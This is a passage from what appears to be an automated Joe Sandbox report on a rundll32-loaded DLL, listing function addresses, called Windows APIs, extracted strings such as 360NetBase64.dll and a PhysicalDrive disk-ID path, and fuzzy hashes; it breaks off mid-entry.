                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: LongNamePathmemsetwcschr
                                                                  • String ID: System32
                                                                  • API String ID: 1234868084-919923750
                                                                  • Opcode ID: 63ae055987751f564649761a82e02fa83986ab2b29aab6a60c23bad4ffdf8bdd
                                                                  • Instruction ID: 022cfa0bf7d635e91ec6b184de1930e682d5e478c1da967905a178ce1f931210
                                                                  • Opcode Fuzzy Hash: 63ae055987751f564649761a82e02fa83986ab2b29aab6a60c23bad4ffdf8bdd
                                                                  • Instruction Fuzzy Hash: DA117536304A4892EBA1DB55E4843DA23A0F78CBD4F948625ABBD437D5DF38C699C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180040358 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FreeLibraryLoad$FindFolderLockPathQuerySizeofSpecialValuefreemallocmemmovememset
                                                                  • String ID: %u.%u.%u$\Internet Explorer\IEXPLORE.EXE
                                                                  • API String ID: 28297470-3177478685
                                                                  • Opcode ID: 24d6d362a50ceef5c55e60ddcc5b0fe3f6e297d637c40a6a892b7a9edbf356b3
                                                                  • Instruction ID: 8c267d1c97a4f3ae60188c217bf77148b2efdc3265efdf379ec177d08f4db65c
                                                                  • Opcode Fuzzy Hash: 24d6d362a50ceef5c55e60ddcc5b0fe3f6e297d637c40a6a892b7a9edbf356b3
                                                                  • Instruction Fuzzy Hash: 95118F32325A8986EB91DB25E4457DB7360F78C789F805012B68A47955DF3DC609CF00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018003C7D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FilePath$AppendCriticalExistsInitializeModuleNameSection
                                                                  • String ID: ..\360NetBase64.dll
                                                                  • API String ID: 2373086246-4183035884
                                                                  • Opcode ID: d761a6c3e6a00880f8900059568cee75d214a1108ffb73bc445c6367f4a0409a
                                                                  • Instruction ID: af5cf4f44f90b4c64e773468feb6851d22c47134ddc293a853e7e5ebda926cde
                                                                  • Opcode Fuzzy Hash: d761a6c3e6a00880f8900059568cee75d214a1108ffb73bc445c6367f4a0409a
                                                                  • Instruction Fuzzy Hash: 25114C71614A4981FBF3AB60E8953DB23A0FB8D7C9F518115B58D825A5EF28C74DC702
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180002DE4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: wcsncmp$DirectoryPath
                                                                  • String ID: \\?\
                                                                  • API String ID: 911398208-4282027825
                                                                  • Opcode ID: eba105415aec120dfe2fa9ea8ee759a3358e54afb6881a7277e4926ce0db569d
                                                                  • Instruction ID: 9903006c7179f3997e6314bb7e882962eeb1ce79a0b7cc9db4c5bfd4c7dd6eaa
                                                                  • Opcode Fuzzy Hash: eba105415aec120dfe2fa9ea8ee759a3358e54afb6881a7277e4926ce0db569d
                                                                  • Instruction Fuzzy Hash: E501AD3036568882FBA2EB25EC457E97214BB4CBD0F848235B96A8B1E5DF6CC34DC304
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800142E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalFilePathSection$AppendEnterExistsLeaveModuleNamememset
                                                                  • String ID: ..\safemon\FreeSaaS.tpi
                                                                  • API String ID: 154803636-205188023
                                                                  • Opcode ID: 5dcafe1727c8202c4fade54654e340c0afccdd89b962ceed78f6299e177fdd45
                                                                  • Instruction ID: d74fc56e569283819db6817bdf86699dd223bda9e6afadc26b68049d38556e4d
                                                                  • Opcode Fuzzy Hash: 5dcafe1727c8202c4fade54654e340c0afccdd89b962ceed78f6299e177fdd45
                                                                  • Instruction Fuzzy Hash: B5016D35219A8C82FBE2D721EC693D92790B78D388F80D041A4AA077A1DF2DC30DCB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800560C8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000180056109
                                                                  • CreateMutexW.KERNEL32(?,?,?,?,?,?,00000000,000000018000BCF5,?,?,?,?,?,0000000180006143), ref: 000000018005611D
                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,000000018000BCF5,?,?,?,?,?,0000000180006143), ref: 000000018005612B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: DescriptorSecurity$ConvertCreateFreeLocalMutexString
                                                                  • String ID: D:P(OA;;FA;;;WD)
                                                                  • API String ID: 794372803-936388898
                                                                  • Opcode ID: 8eafacdefded48d18c198f43637dcf9209a60b0ec07301bfb3a11cb5b2937e32
                                                                  • Instruction ID: 0d5b46b33c23d90729eae48064ade5dfd8da35591b75e80b0d34519ac450dbba
                                                                  • Opcode Fuzzy Hash: 8eafacdefded48d18c198f43637dcf9209a60b0ec07301bfb3a11cb5b2937e32
                                                                  • Instruction Fuzzy Hash: 44014B72A14F4486EB518F21F8487A973E0F78CBD4F468221EA5D87714DF38C658C744
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018002AD5C Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 381COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5
                                                                  • _wcsicmp.MSVCRT ref: 000000018002AE4E
                                                                    • Part of subcall function 00000001800275E4: IIDFromString.OLE32(?,?,?,?,?,?,?,00000001800254CC), ref: 000000018002760B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FromHeapProcessString_wcsicmp
                                                                  • String ID: $CLSID$ftp:
                                                                  • API String ID: 2012545421-381575252
                                                                  • Opcode ID: 248410c0f50f664e6cc0f1b348e136da499af2e3908b9f8e498f8b2d610c306c
                                                                  • Instruction ID: d299122ce3e9d517528ccb327dc5a756d1d769515d838a72f3e491c2ced193a8
                                                                  • Opcode Fuzzy Hash: 248410c0f50f664e6cc0f1b348e136da499af2e3908b9f8e498f8b2d610c306c
                                                                  • Instruction Fuzzy Hash: 41F14073301B4886EB52DB29D8407DE7361F789BE9F448311AA6D876E5DF78CA49C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018006616C Relevance: 6.3, APIs: 5, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterInitializeLeavefreemallocmemmove
                                                                  • String ID:
                                                                  • API String ID: 1740668140-0
                                                                  • Opcode ID: 22bd5bec54ccc0147c543859d5de4a8772452d611ad636121f4766ad3a15c823
                                                                  • Instruction ID: e94a3ea1fea36b0b32ca35adaff13378f84fa0a728ffd439e1abdc7c1a055df0
                                                                  • Opcode Fuzzy Hash: 22bd5bec54ccc0147c543859d5de4a8772452d611ad636121f4766ad3a15c823
                                                                  • Instruction Fuzzy Hash: 4D316C32605B4886EB828F15EC543D977A5F79CBE4F59C225EAA9077A5CF3CC249C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018002CD40 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 142COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsicmp
                                                                  • String ID: ScriptEngine$ScriptHostEncode${0CF774D0-F077-11D1-B1BC-00C04F86C324}
                                                                  • API String ID: 2081463915-2936173157
                                                                  • Opcode ID: 91efc328dbdbb67abd3faf589063878782725af3816d995bc94ee69e6f4a6945
                                                                  • Instruction ID: 292b1ab8c79ee979d74f734f58635ebd7dc6439912a4449b937fba72fcba6d7c
                                                                  • Opcode Fuzzy Hash: 91efc328dbdbb67abd3faf589063878782725af3816d995bc94ee69e6f4a6945
                                                                  • Instruction Fuzzy Hash: 5B514F72711E4986EB419F79C8807CC2760FB49BF4F449322AA3E936E5DF64C989C340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018003C208 Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterInitializeLeave
                                                                  • String ID:
                                                                  • API String ID: 3991485460-0
                                                                  • Opcode ID: 679129d8c6ac973d941e645a86577fd2f61a9db60b9c7d755c606238edf6303c
                                                                  • Instruction ID: ad71276d619936af7ac4a5a15bbb21467ea728ff9fc93a66917b9291cac940fe
                                                                  • Opcode Fuzzy Hash: 679129d8c6ac973d941e645a86577fd2f61a9db60b9c7d755c606238edf6303c
                                                                  • Instruction Fuzzy Hash: 04514B36201B4886EB96CF21E844B9E33A9FB48BD8F158516EE6947768CF34C658C391
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018007118C Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _errno$freewcstol
                                                                  • String ID:
                                                                  • API String ID: 1017142431-0
                                                                  • Opcode ID: ff5ef48b78630e08533642c69faefc33a22d26cdb222d6ff618587a61c53f66f
                                                                  • Instruction ID: d086f90ac81a06e5d512d2f495a144483870d0a007861e51eb34273852a96ff0
                                                                  • Opcode Fuzzy Hash: ff5ef48b78630e08533642c69faefc33a22d26cdb222d6ff618587a61c53f66f
                                                                  • Instruction Fuzzy Hash: 65516B326047888AEBA68F5AA0403EE73A4F7887D5F108115FF9957BD8CF3AD655CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018004C20C Relevance: 6.1, APIs: 4, Instructions: 128COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: String$??2@Free$??3@Alloc
                                                                  • String ID:
                                                                  • API String ID: 1832687772-0
                                                                  • Opcode ID: ec64ef81cce12dd9496e54433e59b2b444f0d078a8dee198f6ac45ada33b9a8a
                                                                  • Instruction ID: 427e473512a75300f47d7fa230ba5ccb5e5a60885440308665830fb44559812f
                                                                  • Opcode Fuzzy Hash: ec64ef81cce12dd9496e54433e59b2b444f0d078a8dee198f6ac45ada33b9a8a
                                                                  • Instruction Fuzzy Hash: 58513A72711A0885EB91DFA5C8947ED3370FB48FE9F098621EE2A57698DF78C648C344
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180072146 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _errno$freewcstol
                                                                  • String ID:
                                                                  • API String ID: 1017142431-0
                                                                  • Opcode ID: 9f264acde1fee37a4af08923b04b71ab41a6f4bc8a876f6580f083589344777c
                                                                  • Instruction ID: ea2c5121f7eb01e98f314e31e7cc383447851c7166ff6db358424aa6cc9ed06f
                                                                  • Opcode Fuzzy Hash: 9f264acde1fee37a4af08923b04b71ab41a6f4bc8a876f6580f083589344777c
                                                                  • Instruction Fuzzy Hash: C351683264478886EBA68F26A1403AE33E5F7597D8F008115FF9907798CF3ADA59CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180072242 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _errno$freewcstol
                                                                  • String ID:
                                                                  • API String ID: 1017142431-0
                                                                  • Opcode ID: c26116d00bfa255a5e71194d5ccf5fda896b8abf688f47e901cb44eb358fcc84
                                                                  • Instruction ID: b35714efefb3a3022de44867f37344a12698415f3c6fa059f944579b3902dd1a
                                                                  • Opcode Fuzzy Hash: c26116d00bfa255a5e71194d5ccf5fda896b8abf688f47e901cb44eb358fcc84
                                                                  • Instruction Fuzzy Hash: AE415A7264478886EBB68F2594503EE37A1F7597E8F008115FF5807798CF3EDA5A8B00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018000ADF4 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1717984340-0
                                                                  • Opcode ID: ac5000abb9ee01d321f1ec273ada81a5511227e924beba0eb19fad604af8d780
                                                                  • Instruction ID: bae3b3959ef39ef5daeeababb2c60870945ab1ace41e6c98233782fb8fc2ea52
                                                                  • Opcode Fuzzy Hash: ac5000abb9ee01d321f1ec273ada81a5511227e924beba0eb19fad604af8d780
                                                                  • Instruction Fuzzy Hash: 9B31D272604B8482E764CF56B88074AB7A8F79DBD0F548628AFD947BA5CF38C645C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018006C200 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 000000018006A2B8: malloc.MSVCRT(?,?,?,0000000180069638), ref: 000000018006DF0A
                                                                    • Part of subcall function 000000018006A2B8: SetLastError.KERNEL32(?,?,?,0000000180069638), ref: 000000018006DF1B
                                                                    • Part of subcall function 000000018006A32C: CreateFileA.KERNEL32 ref: 000000018006A363
                                                                  • memset.MSVCRT ref: 000000018006C2AB
                                                                    • Part of subcall function 000000018006A2C8: DeviceIoControl.KERNEL32 ref: 000000018006A2F1
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000400,?,00000000,00002000,00000000,000000018006C06D), ref: 000000018006C308
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseControlCreateDeviceErrorFileHandleLastmallocmemmovememset
                                                                  • String ID: DISKID:$\\.\PhysicalDrive%d
                                                                  • API String ID: 1541746987-3765948602
                                                                  • Opcode ID: 0a0cd503669e2d71dfc94f1a05760105f70003c8e3e1ab21ca38997401335250
                                                                  • Instruction ID: 026b1f04e6263926176f9cf333c98f43658e4a5f02bea82afa83b16206533a48
                                                                  • Opcode Fuzzy Hash: 0a0cd503669e2d71dfc94f1a05760105f70003c8e3e1ab21ca38997401335250
                                                                  • Instruction Fuzzy Hash: D831063220474542FBA29B66AC00BEA7392F789BD4F608121BE5947795DF3CC749CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018001E200 Relevance: 6.1, APIs: 4, Instructions: 75registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Delete
                                                                  • String ID:
                                                                  • API String ID: 1035893169-0
                                                                  • Opcode ID: 22d0e1e140aac874fdce29ddc6509984b94616c0dddbf9d09c1d0fd8dd23a40b
                                                                  • Instruction ID: 40b5deca117a7cefaab46096add2d716b918ff16b730c8479b301d173d09ace7
